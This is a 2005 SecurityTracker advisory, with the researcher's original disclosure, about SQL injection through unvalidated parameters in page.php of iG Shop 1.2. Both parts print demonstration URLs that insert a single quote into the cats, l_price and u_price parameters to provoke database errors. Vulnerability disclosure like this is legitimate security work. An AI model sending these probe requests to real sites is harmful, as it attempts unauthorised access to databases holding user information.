iG Shop Input Validation Bugs Let Remote Users Execute SQL Commands
|
|
SecurityTracker Alert ID: 1013268 |
|
SecurityTracker URL: http://securitytracker.com/id/1013268
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 23 2005
|
Impact:
Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 1.2
|
Description:
A vulnerability was reported in iG Shop. A remote user can inject SQL commands.
The 'page.php' script does not properly validate user-supplied input in several variables. A remote user can submit a specially crafted request to execute SQL commands on the underlying database.
Some demonstration exploit URLs are provided:
http://[target]/page.php?page_type=catalog_products&type_id[]=2
&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
http://[target]/page.php?page_type=catalog_products&type_id[]=2
&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price='&u_price=1&Submit=Search
http://[target]/page.php?page_type=catalog_products&type_id[]=2
&SESSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price=1&u_price='&Submit=Search
The vendor was notified on February 14, 2005 without response.
John Cobb reported this vulnerability.
|
Impact:
A remote user can execute arbitrary SQL commands on the underlying database.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.igeneric.co.uk/display_resources/resource1.html (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: [NOBYTES.COM: #5] iGeneric eShop 1.2 - Information Disclosure &
|
Hello All,
I have discovered multiple vulnerabilities in: iGeneric eShop 1.2
Authors Site: http://www.igeneric.co.uk
+-[Examples:]--------------------------------------------------+
Information Disclosure & Possible SQL Injection:
http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='
http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price='&u_price=1&Submit=Search
http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price=1&u_price='&Submit=Search
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 10/02/2005
Author(s) Informed on: 14/02/2005
Author(s) Response: None As Of Yet
Author(s) Fix: None As Of Yet
Regards
John Cobb
JohnC@NoBytes.com
http://www.nobytes.com
|
|